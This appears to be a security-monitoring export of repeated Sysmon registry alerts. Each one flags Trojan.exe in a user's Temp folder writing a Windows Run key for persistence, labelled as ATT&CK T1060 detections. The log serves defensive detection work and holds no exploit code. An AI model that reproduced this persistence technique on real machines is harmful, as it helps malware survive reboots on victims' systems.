HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:22.758621800Z"",""eventRecordID"":""1220"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:22.746\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:22.746"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:34.932",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:21.733 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:21.793528500Z"",""eventRecordID"":""1219"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:21.733\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:21.733"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:33.905",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:20.665 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:20.736098100Z"",""eventRecordID"":""1217"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:20.665\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:20.665"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:32.915",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:19.540 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:19.726531800Z"",""eventRecordID"":""1215"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:19.540\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:19.540"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:30.604",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:18.399 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:18.402764800Z"",""eventRecordID"":""1214"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:18.399\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:18.399"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:29.700",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:17.352 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:17.364882600Z"",""eventRecordID"":""1212"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:17.352\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:17.352"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:29.680",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:16.336 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:16.357836100Z"",""eventRecordID"":""1211"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:16.336\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:16.336"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:29.634",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:15.306 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:15.307725900Z"",""eventRecordID"":""1210"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:15.306\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:15.306"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:26.431",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:14.290 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:14.291591900Z"",""eventRecordID"":""1209"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:14.290\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:14.290"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:26.415",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:13.274 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:13.292704400Z"",""eventRecordID"":""1208"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:13.274\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:13.274"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:25.416",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:12.258 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:12.272034400Z"",""eventRecordID"":""1206"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:12.258\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:12.258"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:24.686",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:11.243 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 